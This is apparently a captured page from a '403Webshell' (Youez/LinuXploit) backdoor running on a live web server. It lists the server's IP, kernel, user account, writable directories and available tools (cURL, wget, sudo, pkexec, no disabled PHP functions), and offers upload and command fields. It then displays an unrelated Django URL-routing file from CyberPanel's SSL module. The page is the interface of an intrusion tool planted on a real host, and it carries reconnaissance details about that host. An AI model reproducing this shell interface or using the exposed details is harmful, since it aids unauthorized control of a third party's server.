403Webshell
Server IP : 195.114.193.97  /  Your IP : 216.73.216.238
Web Server : LiteSpeed
System : Linux host 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
User : sembi4241 ( 1126)
PHP Version : 8.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/local/CyberCP/manageSSL/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/local/CyberCP/manageSSL/urls.py
from django.urls import path
from . import views

urlpatterns = [
    path('', views.loadSSLHome, name='loadSSLHome'),

    path('manageSSL', views.manageSSL, name='manageSSL'),
    path('issueSSL', views.issueSSL, name='issueSSL'),

    path('sslForHostName', views.sslForHostName, name='sslForHostName'),
    path('obtainHostNameSSL', views.obtainHostNameSSL, name='obtainHostNameSSL'),

    path('sslForMailServer', views.sslForMailServer, name='sslForMailServer'),
    path('obtainMailServerSSL', views.obtainMailServerSSL, name='obtainMailServerSSL'),

    # v2 functions
    path('v2ManageSSL', views.v2ManageSSL, name='v2ManageSSL'),
    path('v2IssueSSL', views.v2IssueSSL, name='v2IssueSSL'),
]

Youez - 2016 - github.com/yon3zu
LinuXploit